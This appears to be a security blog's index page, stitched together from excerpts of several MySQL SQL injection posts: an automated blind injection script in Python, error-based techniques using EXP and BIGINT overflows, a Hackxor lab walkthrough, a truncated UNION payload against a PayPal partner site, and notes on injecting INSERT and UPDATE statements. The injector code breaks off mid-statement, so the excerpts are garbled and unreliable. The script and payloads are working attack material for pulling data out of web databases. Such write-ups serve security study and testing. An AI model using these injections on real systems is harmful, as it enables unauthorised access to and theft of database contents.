Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version:

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)

url = '' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html =

  '(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)

print (result)


Error Based SQL Injection Using EXP


This is another overflow in the DOUBLE data type in MySQL I found. You can refer to my previous post on BIGINT Overflow Error based injections if you want to understand exploiting overflows in extracting data. Also the queries are similar to my previous post. When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.

mysql> select exp(709);
| exp(709) |
| 8.218407461554972e307 |
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp is the opposite of the ln and log functions of MySQL. If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to: $latex e \approx 2.71828183&bg=FFFFFF&s=1$ .

$latex ln(15) = log_ {e} (15) = 2.70805020110221 &bg=FFFFFF&s=1$

BIGINT Overflow Error Based SQL Injection


I was interested in finding out new techniques that we can use in extracting data via MySQL errors. This is a detailed write-up which will make you understand how I made these queries. When we look how MySQL handles integers I was interested in causing overflows. This is how MySQL stores integers.

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These overflow errors will cause in MySQL versions 5.5.5 and above only. In below versions integer overflows would result in a silent wraparound.
The data type BIGINT is of 8 bytes in size which means it’s of 64 bits. If we take the maximum signed value of a BIGINT its “0b0111111111111111111111111111111111111111111111111111111111111111”, “0x7fffffffffffffff”, “9223372036854775807” in binary, hex and decimal respectively. Once we evaluate numerical expressions on this value like adding will cause a “BIGINT value is out of range” error.

mysql> select 9223372036854775807+1;
ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'


Hackxor SQL Injection

You can download the complete challenge VM from here. They have provided the online version of first two levels. I was interested in having a look at it.

There is a login page and our goal is to extract all the usernames and passwords from the database.

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If you try injecting the login form, none of the injections would work. But there was this text called “No account?” when you click it you get this message.

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After logging with demo:demo we are taken to “proxypanel.jsp” which displays source, target and date.

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Paypal Partner SQL Injection

One of the Paypal Partner websites was suffering from a POST SQL injection. Union injection was impossible in here.

[code language=”sql”]
LoginForm[email]=-1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,

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As we cannot continue with the above error, double query injection works perfectly.

MySQL name_const Crash

This is a small crash I found in MySQL 5.0.45 in the name_const function. I’ve tested this in a Windows 8 environment. However this function won’t allow performing select queries in latest versions. In older versions greater than or equal to 5.0.12 you can reproduce this issue.
I fuzzed the name_const() function and I noticed that when performing a conditional statement inside a sub query we can make the MySQL application freeze. Once we press ^c twice we get the error message. (more…)

Injection in Insert, Update and Delete Statements


Most of the time when we talk about SQL injection we extract data by using the union keyword, error based, blind boolean and time based injection methods. All this come under a place where the application is performing a select statement on the back-end database. How to inject into places where the application is performing an insert, update, delete statement? For example insert statements are used in applications when they want to store ip addresses, user agents, referrer urls and stuff in the database. While manipulating with user accounts when creating a new password, changing names, deleting accounts these statements are used. Not only just user input if we can fuzz around into whatever the application is taking as input and if they aren’t properly sanitized to filter we can go ahead and inject (Assuming that there are no WAFs or any blacklists). This post is based on the MySQL error response. In the web application mysql_error() should be echoed back to us.

Lab Setup

Let’s create a database first by the name `newdb` and create one sample table to practice our injections. Stick to your localhost. Don’t go ahead and test against live websites without any permissions. I take no responsibility for any damage you cause.